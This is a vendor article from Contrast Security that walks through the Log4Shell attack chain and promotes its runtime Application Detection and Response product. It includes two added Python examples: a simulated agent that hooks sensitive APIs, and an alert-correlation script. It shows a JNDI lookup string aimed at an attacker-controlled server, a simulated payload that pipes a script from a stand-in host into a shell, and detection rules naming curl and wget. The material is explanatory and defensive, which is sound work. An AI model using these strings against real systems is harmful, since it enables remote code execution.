Anatomy of an Attack

In today's rapidly changing threat landscape, organizations face increasingly sophisticated attacks aimed at their applications. Understanding these threats, and the technologies built to counter them, is essential. This article walks through the mechanics of a typical application attack, using the notorious Log4Shell vulnerability as a model, and shows how Application Detection and Response (ADR) technology protects against such vulnerabilities in real time.


The anatomy of a modern application attack: Log4Shell

To illustrate the complexity and severity of modern application attacks, let's examine an attack against the infamous Log4Shell vulnerability (CVE-2021-44228) that shook the security world in late 2021. This attack is a textbook case of attack chaining, combining JNDI injection, Expression Language (EL) injection, and command injection.

Technology note: The CVE program, which publicly catalogs computer security flaws, is maintained by MITRE. Each CVE entry has a unique identifier, which makes it easier for IT professionals to exchange information about a vulnerability across different security tools and services.

Phase 1: Exploitation of the vulnerability

Log4Shell affects Log4j, a ubiquitous Java logging library. The attack begins when an attacker sends a specially crafted request to a vulnerable application. The request contains a Java Naming and Directory Interface (JNDI) lookup string of the form:

${jndi:ldap://attacker-controlled-server.com/payload}

Technology note: JNDI (Java Naming and Directory Interface) is a Java API that provides naming and directory services to Java applications. It lets an application locate and retrieve data and objects by name, a capability that can be abused in vulnerabilities such as Log4Shell. Here it is abused to open a connection to a malicious server.

Phase 2: JNDI lookup and EL evaluation

When a vulnerable Log4j version logs this string, it treats the ${jndi:...} segment as an expression to be evaluated. Evaluating it causes the application to perform a JNDI lookup, reaching out to the attacker-controlled Lightweight Directory Access Protocol (LDAP) server named in the string.

Technology note: Log4j is a widely used Java logging library developed by Apache. It is heavily used in Java applications to log all kinds of data and events.

Phase 3: Malicious payload retrieval

The attacker's LDAP server responds with an EL injection payload. Because of how JNDI works and how Log4j handles the response, this payload is treated as an EL expression to be evaluated.

Phase 4: EL injection

The EL expression typically contains malicious code designed to abuse the EL interpreter. It may include instructions to download and run additional malware, exfiltrate data, or establish a backdoor in the system.

Technology note: Expression Language (EL) is a scripting language that allows access to application data. EL injection occurs when an attacker can manipulate or inject malicious EL expressions, potentially leading to code execution. EL injection vulnerabilities are common among runtime vulnerabilities, either directly or indirectly through chained attacks such as the one shown here.

Phase 5: Code execution

When the EL interpreter evaluates the injected expression, it runs the malicious code in the context of the vulnerable application. This gives the attacker a foothold in the system, often with the same privileges as the application itself.

The impact and risk of Log4Shell

What makes Log4Shell so severe is how widely the Log4j library is used and how easy the flaw was to exploit. Several factors compound the concern:

  1. Broad attack surface: Log4j is used in countless Java applications and frameworks, making this type of vulnerability widespread.
  2. Remote code execution: The associated JNDI injection can lead directly to remote code execution (RCE), giving attackers significant control over the vulnerable system.
  3. Hard to detect: Attacks against Log4Shell can be obfuscated, making them hard to catch with the simple pattern matching of network-level defenses.
  4. Chained attacks: The JNDI injection can be combined with other techniques, such as EL injection and command injection, to build more elaborate attacks.

This breakdown of the Log4Shell attack shows why application-layer attacks are so formidable and why defenses such as Application Detection and Response (ADR), described in detail below, are essential for detecting and stopping them.


From foothold to action on objectives

With initial access established, attackers can use this foothold to pursue further objectives, such as:

  • Privilege escalation: The attacker may exploit local vulnerabilities to gain higher privileges on the compromised system.
  • Reconnaissance: Using their elevated access, the intruder can explore the internal network for other vulnerable systems or valuable information.
  • Credential harvesting: The compromised system can be used to collect credentials stored in memory or in configuration files.
  • Lateral movement: Using harvested credentials or other vulnerabilities, the attacker can compromise additional systems on the network.
  • Data exfiltration or ransomware deployment: Depending on their goals, attackers may steal sensitive data or deploy ransomware across the compromised network.

The limitations of current security approaches

Before going into the specifics of ADR, it helps to understand the significant gap it fills in many organizations' security strategies: the lack of strong application-level threat detection.

Web application firewalls (WAFs)

Many organizations rely on WAFs as their primary shield against application-level threats. This approach has several important limitations:

  • Network-centric focus: WAFs operate at the network level, inspecting incoming traffic patterns to spot potential threats. While this can be effective against known attack patterns, it offers limited insight into what actually happens inside the application.
  • False positives: Lacking application-specific context, WAFs often generate a high volume of false positives, which can overwhelm security teams and lead to alert fatigue.
  • Susceptibility to evasion: WAF evasion techniques are remarkably easy to execute. Attackers can often slip past WAF protections using encoding variations, protocol-level evasion, or payload padding.
  • Poor SOC integration: Even where WAFs are in place, organizations often fail to configure them to feed detailed application-level data to their security operations center (SOC).

Technology note: A WAF is a security tool that monitors, filters, and blocks HTTP traffic to and from a web application. It operates at the network level and is intended to help protect web applications from attacks such as Cross-Site Scripting (XSS) and SQL injection.

Technology note: WAF evasions are techniques attackers use to render WAF controls ineffective. They include ways of sneaking malicious payloads past the WAF's signature-based protections, or bypassing the WAF entry point to the application entirely. A defense-in-depth strategy for AppSec is essential: never rely on a single control to secure the application layer.

Endpoint Detection and Response (EDR)

EDR solutions focus on monitoring and protecting individual endpoints within an organization. While essential to overall security, EDR has its own limitations when it comes to application security:

  • Focus on endpoint activity: EDR primarily monitors system-level events and processes, not application-specific behavior.
  • Limited insight into application internals: EDR solutions lack visibility into the internal workings of applications.
  • Reactive nature: EDR often detects threats only after they have executed on an endpoint.
  • Gaps in cloud and web application coverage: As applications move to cloud-based services, traditional EDR solutions may leave gaps.

Technology note: EDR is a cybersecurity technology that continuously monitors and responds to threats on endpoint devices such as computers, laptops, and mobile devices. EDR solutions collect and analyze data from endpoints so that security operations teams can detect, investigate, and mitigate suspicious activity and potential breaches. They typically provide real-time visibility, threat detection, and automated response capabilities, focusing on endpoint-level activity rather than application-specific behavior.

The ADR advantage

ADR technology addresses these limitations by operating inside the application itself. This approach offers several key advantages:

  1. Deep application insight: ADR observes code execution and data flow, providing a level of visibility that network-level solutions simply cannot match.
  2. Context-aware detection: By understanding the application's behavior, ADR can distinguish legitimate actions from genuine threats more precisely, substantially reducing false positives.
  3. Zero-day protection: ADR's deep application insight lets it detect and counter novel attack patterns, offering better protection against zero-day vulnerabilities.
  4. Layered defense against WAF evasion: ADR serves as a crucial second line of defense, capable of detecting threats that have successfully bypassed WAF protections.
  5. Comprehensive, actionable intelligence: ADR can deliver detailed, context-rich data about application-level threats directly to SOC teams, bridging the visibility gap and enabling more effective threat response.

By deploying ADR, organizations can close this critical gap in their security posture, gaining the ability to detect and respond to sophisticated application-level threats that existing solutions might miss.

Technology note: ADR is a security approach focused on detecting and responding to threats at the application level. Unlike other AppSec measures that operate at the network level, ADR operates within the application itself, providing deeper visibility into application behavior and more accurate threat detection.

Technology note: A zero-day vulnerability is a software security flaw that is unknown to the software vendor and has not yet been fixed. Such flaws can be exploited by malicious actors before the vendor becomes aware of them and rushes out a fix.

Contrast ADR in action

Contrast Security uses ADR technology to detect and stop attacks like Log4Shell at multiple points. Let's look at the architecture that makes this possible and at what it means in practice.

Architecture of Contrast ADR

Contrast ADR uses an agent-based architecture that integrates directly with the application's runtime:

  • Agent deployment: A lightweight agent is placed in the application's runtime environment (for example, the Java Virtual Machine [JVM] for Java applications).
  • Runtime integration: The agent integrates with the application code, enabling real-time monitoring and analysis of application behavior.
  • Instrumentation: Instrumentation techniques observe code execution, data flow, and API calls without modifying the application's source code.
  • Response mechanism: On detecting a threat, the agent acts immediately, for example by blocking the malicious activity or alerting security teams.

Staged protection against Log4Shell

Step 1: Detection of JNDI injection

By hardening the JVM's security settings, Contrast Runtime Security can detect the unauthorized JNDI lookup attempt.

Step 2: Detection of EL injection

Contrast Runtime Security can identify EL injection attempts and prevent them by hardening the JVM's security settings against misuse of the JVM's EL processing capabilities.

Step 3: Prevention of code execution

In the rare case that malicious code is loaded, the Contrast Runtime Security Platform applies:

  • Command injection prevention: Classification, tracing, and semantic analysis techniques that stop attacker payloads from reaching critical APIs.
  • Process hardening: Hardened JVM security settings that prevent misuse of the JVM's sensitive command-execution APIs.
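To make the agent mechanism behind these three steps concrete, here is an added example (it is not Contrast's code and does not come from the original article) of how an in-process agent can hook an application's sensitive APIs without touching its source. The application class App, its three sink methods, the rule names, the allow-listed host and the attacker.invalid address are all hypothetical stand-ins: jndi_lookup plays the role of InitialContext.lookup, evaluate the EL interpreter, and run_command Runtime.exec. The Agent wraps each sink at runtime, inspects the argument before the real call, records an event and, in BLOCK mode, raises before the sink executes; in MONITOR mode it lets the chain continue so that every stage is recorded.

```python
"""Toy in-process agent that hooks an application's sensitive APIs.

Constructed example, not Contrast's code. App, its sinks, the rule names
and the allow-listed host are hypothetical stand-ins; the mechanism is the
point: the application's source is untouched, the agent wraps the sinks at
runtime, inspects their arguments, records an event and, in BLOCK mode,
raises before the sink runs.
"""
import re
import shlex
from dataclasses import dataclass, field
from urllib.parse import urlsplit


class App:
    """Hypothetical vulnerable application with three sensitive sinks."""

    JNDI_PATTERN = re.compile(r"\$\{jndi:([^}]+)\}")

    def jndi_lookup(self, name: str) -> str:
        # Stand-in for InitialContext.lookup(). A real call would contact the
        # named server; here every "server" answers with a canned payload so the
        # chain can be followed offline.
        return "exec:curl http://attacker.invalid/x.sh | sh"

    def evaluate(self, expression: str) -> str:
        # Stand-in for the EL interpreter: an "exec:" expression spawns a command.
        if expression.startswith("exec:"):
            self.run_command(expression[len("exec:"):])
        return expression

    def run_command(self, cmdline: str) -> int:
        # Stand-in for Runtime.exec(); nothing is spawned, a fake status is returned.
        return 0

    def handle_request(self, header_value: str) -> str:
        # The vulnerable behaviour: a logged header containing a lookup is resolved.
        match = self.JNDI_PATTERN.search(header_value)
        if match:
            self.evaluate(self.jndi_lookup(match.group(1)))
        return "ok"


class Blocked(RuntimeError):
    """Raised by the agent in BLOCK mode when a sink call violates policy."""


@dataclass
class Agent:
    mode: str = "MONITOR"   # MONITOR records; BLOCK records and stops the call
    allowed_jndi_hosts: frozenset = frozenset({"ldap.corp.example"})  # hypothetical
    events: list = field(default_factory=list)

    def _record(self, rule: str, sink: str, detail: str) -> None:
        blocked = self.mode == "BLOCK"
        self.events.append({"rule": rule, "sink": sink, "detail": detail, "blocked": blocked})
        if blocked:
            raise Blocked(f"{rule} at {sink}: {detail}")

    # One rule per sink.
    def check_jndi(self, name: str) -> None:
        parts = urlsplit(name)
        if parts.scheme in ("ldap", "ldaps", "rmi", "dns") and parts.hostname not in self.allowed_jndi_hosts:
            self._record("jndi-injection", "jndi_lookup", f"remote lookup to {parts.hostname}")

    def check_el(self, expression: str) -> None:
        if expression.startswith("exec:"):
            self._record("el-injection", "evaluate", expression)

    def check_command(self, cmdline: str) -> None:
        tokens = shlex.split(cmdline)
        if any(t in ("curl", "wget") for t in tokens) or any(c in cmdline for c in ";|&`"):
            self._record("command-injection", "run_command", cmdline)

    def instrument(self, app: App) -> App:
        """Wrap the sinks on this instance; the App class itself is not modified."""
        for sink, rule in (("jndi_lookup", self.check_jndi),
                           ("evaluate", self.check_el),
                           ("run_command", self.check_command)):
            original = getattr(app, sink)

            def hook(arg, _original=original, _rule=rule):
                _rule(arg)              # inspect the argument before the sink runs
                return _original(arg)

            setattr(app, sink, hook)
        return app


def simulate(mode: str, header_value: str = "${jndi:ldap://attacker.invalid:1389/a}") -> dict:
    """Send one request through an instrumented app and report what the agent saw."""
    agent = Agent(mode=mode)
    app = agent.instrument(App())
    try:
        app.handle_request(header_value)
        completed = True
    except Blocked:
        completed = False
    return {"rules_fired": [e["rule"] for e in agent.events],
            "blocked": [e["blocked"] for e in agent.events],
            "chain_completed": completed}


if __name__ == "__main__":
    for mode in ("MONITOR", "BLOCK"):
        print(mode, simulate(mode))
```

Run as a script, MONITOR mode reports all three rules firing with the chain completing, while BLOCK mode reports only the JNDI rule and a chain that stopped at the first sink, which is the difference between the two modes that the article's practical example relies on. A benign request fires no rule in either mode.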

Practical example: Detecting and analyzing a Log4Shell attack

To better understand how Contrast's ADR technology works in practice, let's analyze a set of events from a simulated Log4Shell attack.

Note: So that this example can show the attacker's exploit chaining and the defense-in-depth detection of Contrast ADR, all behavioral rules are set to MONITOR mode rather than BLOCK mode. Normally these rules run in BLOCK mode, which stops the initial JNDI exploit and prevents the subsequent events.

  1. JNDI injection detected: Contrast ADR spots a JNDI injection attempt, recognizing an attempt to redirect an InitialContext lookup to an attacker-controlled LDAP server.
  2. EL injection detected: ADR identifies an EL injection event in which the evaluated expression uses Java class loading to load the JavaScript engine embedded in the JVM. The payload uses JavaScript to build a malicious array intended to execute system commands.
  3. Command injection detected: Contrast ADR identifies a command injection event in which the command attempts to download and run a shell script from an attacker-controlled server.

This breakdown illustrates Contrast ADR's ability to:

  1. Recognize the initial JNDI injection attempt
  2. Follow the attack through its successive execution phases
  3. Spot and analyze malicious payloads
  4. Provide deep insight into the attack sequence, from the initial exploit to potential code execution

This level of insight is essential both for stopping attacks and for understanding emerging threat trends.

ADR's response to a Log4Shell attack

On detecting a potential Log4Shell exploitation attempt, Contrast ADR initiates a comprehensive response aligned with the NIST Cybersecurity Framework:

Identify

  • Uses Software Composition Analysis (SCA) at runtime to continuously map and inventory the application environment, flagging vulnerable Log4j instances.
  • Provides real-time insight into the application's behavior and data flow during the attack attempt.

Protect

  • In blocking mode, blocks the initial JNDI lookup to the malicious server.
  • Reduces the attack surface by hardening JVM security settings to restrict JNDI capabilities.

Detect

  • Recognizes and alerts on JNDI lookup attempts toward the malicious LDAP server.
  • Detects attempts to execute malicious EL payloads.
  • Watches for unauthorized loading and execution of Java classes.
  • Pinpoints suspicious process executions that may indicate command injection.

Respond

  • Triggers pre-defined runbooks for Log4Shell incidents.
  • Delivers enriched triage context, including in-depth analysis of the attack chain and the affected application components.
  • Integrates with SIEM/XDR/SOAR systems, enriching alerts with application-layer details for better incident investigation.

Technology note: SIEM (Security Information and Event Management) refers to a system that collects and analyzes log data from multiple sources across an organization's IT infrastructure. It supports real-time analysis of security alerts generated by applications and network equipment. Examples of SIEM platforms are Splunk, QRadar, and Microsoft Sentinel.

Technology note: XDR (Extended Detection and Response) is a holistic security strategy that collects and correlates data across multiple security layers, including email, endpoints, servers, cloud workloads, and networks. It uses analytics to identify threats and respond automatically, providing a more comprehensive and efficient way to detect, investigate, and resolve security incidents across the entire IT environment.

Recover

  • Supports incident investigation by providing detailed forensic information about the attack attempt.
  • Helps determine the full scope of potential compromise across the application estate.
  • Facilitates post-incident analysis to improve detection and protection capabilities.
  • Provides data for root cause analysis, helping prevent similar incidents in the future.

Throughout this process, the ADR system maintains continuous monitoring, feeds real-time updates to security dashboards, and supports compliance reporting by logging every detection and response action taken.

ADR integration with the SIEM/SOAR/XDR ecosystem

Integrating ADR technology with existing Security Information and Event Management (SIEM); security orchestration, automation, and response (SOAR); and Extended Detection and Response (XDR) systems creates a powerful combination that strengthens overall security operations. Here is how ADR can complement and amplify SIEM/SOAR/XDR-driven workflows:

  • Enhanced incident response and analysis: ADR-triggered alerts are correlated with network-level events in SIEM/SOAR/XDR, giving a complete picture of a possible attack and enabling more effective root cause analysis.
  • Dynamic security management: SIEM/SOAR/XDR can dynamically switch ADR into blocking mode, apply virtual patches, and turn on enhanced logging.
  • Unified threat containment: SIEM/SOAR/XDR coordinate the blocking of malicious IP addresses and use ADR's application-specific context for effective response strategies.
  • Smoother security-development cooperation: ADR generates vulnerability summaries and integrates with ticketing systems, streamlining communication between security and development teams.

By combining ADR with the SIEM/SOAR/XDR ecosystem, organizations achieve more thorough threat detection, faster incident response, and more effective vulnerability management, considerably improving their overall security posture.
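The three detections from the practical example reach the SOC as separate events, and the first SIEM/SOAR/XDR point above is that correlating them with network-level events is what turns alerts into an incident. As an added example (not Contrast's code and not from the original article), the following correlates a small set of constructed event records into ranked incidents. The JSON-lines shape, field names, rule names, addresses and timestamps are all constructed for this example; a real agent or SIEM has its own schema. Events that share a request id are grouped; events without one, such as a WAF log line, are attached to the most recent incident from the same source address inside a short window. Each incident is then ranked by the deepest stage of the chain it reached.

```python
"""Correlate application-level detection events into ranked incidents.

Constructed example, not Contrast's code. The JSON-lines records, field
names, rule names, addresses and timestamps are made up for the example;
a real agent or SIEM uses its own schema.
"""
import json
from datetime import datetime, timedelta

# Constructed events: one request (r-1) that ran the full chain, one (r-2)
# stopped after the lookup, and a WAF-only sighting from a third address.
# The WAF records carry no request id, as a network device's log often does
# not, and are written when the request completes.
EVENTS_JSONL = """\
{"ts":"2024-05-01T10:00:00Z","source":"adr","src_ip":"203.0.113.7","request_id":"r-1","rule":"jndi-injection","detail":"InitialContext.lookup to ldap://attacker.invalid:1389/a"}
{"ts":"2024-05-01T10:00:01Z","source":"adr","src_ip":"203.0.113.7","request_id":"r-1","rule":"el-injection","detail":"expression loads the embedded JavaScript engine"}
{"ts":"2024-05-01T10:00:02Z","source":"adr","src_ip":"203.0.113.7","request_id":"r-1","rule":"command-injection","detail":"Runtime.exec downloads and runs a shell script"}
{"ts":"2024-05-01T10:00:03Z","source":"waf","src_ip":"203.0.113.7","rule":"suspicious-header","detail":"User-Agent matched lookup syntax"}
{"ts":"2024-05-01T10:30:00Z","source":"adr","src_ip":"198.51.100.9","request_id":"r-2","rule":"jndi-injection","detail":"InitialContext.lookup to ldap://attacker.invalid:1389/b"}
{"ts":"2024-05-01T10:30:01Z","source":"waf","src_ip":"198.51.100.9","rule":"suspicious-header","detail":"User-Agent matched lookup syntax"}
{"ts":"2024-05-01T11:00:00Z","source":"waf","src_ip":"192.0.2.5","rule":"suspicious-header","detail":"User-Agent matched lookup syntax"}
"""

# Stage order follows the chain described in the article: a later stage means
# the attacker got further before the application reported it.
STAGE = {"suspicious-header": 0, "jndi-injection": 1, "el-injection": 2, "command-injection": 3}
SEVERITY = {0: "low", 1: "medium", 2: "high", 3: "critical"}
WINDOW = timedelta(minutes=5)   # how long a WAF sighting can trail an incident


def parse_events(jsonl: str) -> list:
    events = []
    for line in jsonl.splitlines():
        if line.strip():
            e = json.loads(line)
            e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(e)
    return sorted(events, key=lambda e: e["ts"])   # stable: ties keep file order


def correlate(events: list) -> list:
    """Group time-ordered events into incidents."""
    incidents, by_request = [], {}
    for e in events:
        rid = e.get("request_id")
        if rid:
            inc = by_request.get(rid)
            if inc is None:
                inc = by_request[rid] = {"key": f"request:{rid}", "src_ip": e["src_ip"], "events": []}
                incidents.append(inc)
        else:
            # No request id: attach to the latest incident from the same source
            # address inside WINDOW, otherwise open a new one keyed by address.
            inc = next((i for i in reversed(incidents)
                        if i["src_ip"] == e["src_ip"] and e["ts"] - i["events"][-1]["ts"] <= WINDOW), None)
            if inc is None:
                inc = {"key": f"ip:{e['src_ip']}@{e['ts']:%H:%M:%S}", "src_ip": e["src_ip"], "events": []}
                incidents.append(inc)
        inc["events"].append(e)
    return [summarize(i) for i in incidents]


def summarize(inc: dict) -> dict:
    events = inc["events"]
    deepest = max(STAGE.get(e["rule"], 0) for e in events)
    return {
        "key": inc["key"],
        "src_ip": inc["src_ip"],
        "chain": [e["rule"] for e in events],
        "deepest_stage": deepest,
        "severity": SEVERITY[deepest],
        # A WAF sighting is a useful pivot, but only the application-level
        # events show that a lookup, evaluation or execution actually happened.
        "network_visibility": any(e["source"] == "waf" for e in events),
        "application_visibility": any(e["source"] == "adr" for e in events),
        "dwell_seconds": int((events[-1]["ts"] - events[0]["ts"]).total_seconds()),
    }


def triage(jsonl: str = EVENTS_JSONL) -> list:
    """Parse, correlate and rank incidents, deepest chain first."""
    return sorted(correlate(parse_events(jsonl)), key=lambda i: i["deepest_stage"], reverse=True)


if __name__ == "__main__":
    for inc in triage():
        print(f"{inc['severity']:8} {inc['key']:22} {' -> '.join(inc['chain'])}")
```

The ranking makes the article's comparison visible: the WAF-only incident from 192.0.2.5 is a request that looked suspicious on the wire but produced no application-level event, while the critical incident is established by the application itself reporting that the lookup, the EL evaluation and the process execution actually occurred.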

Business benefits of ADR technology

Deploying Contrast's ADR technology delivers tangible business benefits:

  1. Reduced risk: By providing multi-layered, context-aware defense, ADR significantly reduces the likelihood of a successful attack, protecting your organization's data and reputation.
  2. Lower total cost of ownership: With fewer false positives and automated protection, security teams can concentrate on high-priority issues, reducing operational costs.
  3. Improved compliance posture: ADR's comprehensive protection and detailed logging help meet compliance requirements such as PCI DSS and GDPR.
  4. Faster time to market: By securing applications from within, ADR lets development teams move quickly without compromising on security, in line with Secure by Design principles.
  5. Better visibility: The deep insights ADR provides strengthen overall security readiness and inform strategic security decisions.

Note: PCI DSS (Payment Card Industry Data Security Standard) is a set of security requirements intended to ensure a secure environment for companies that handle credit card information.

Note: GDPR (General Data Protection Regulation) is a legal framework for data protection and privacy in the EU and EEA. It also governs the transfer of personal data outside the EU and EEA.

Conclusion

As cyber threats evolve, relying solely on network-based application security is no longer adequate to protect critical applications and data. Contrast's ADR technology offers a robust, intelligent, and proactive approach to application security.

By understanding how contemporary attacks work and adopting ADR, organizations can substantially improve their security posture, reduce risk, and keep pace with emerging threats. For security decision-makers, investing in ADR technology is not just a security measure but a strategic necessity for protecting their organization's digital assets in today's threat landscape.

Next steps

To learn more about how ADR technology can strengthen your organization's security and to see its capabilities first-hand, request a demo of Contrast ADR.

Taking these steps puts you on the path to stronger application security and staying ahead of evolving cyber threats.

Note: This article was written by Jonathan Harper, Principal Solutions Engineer at Contrast Security, who has over five years of experience in application security. Jonathan has supported large enterprises and previously held roles at Threat Stack, Veracode, and Micron Technology.
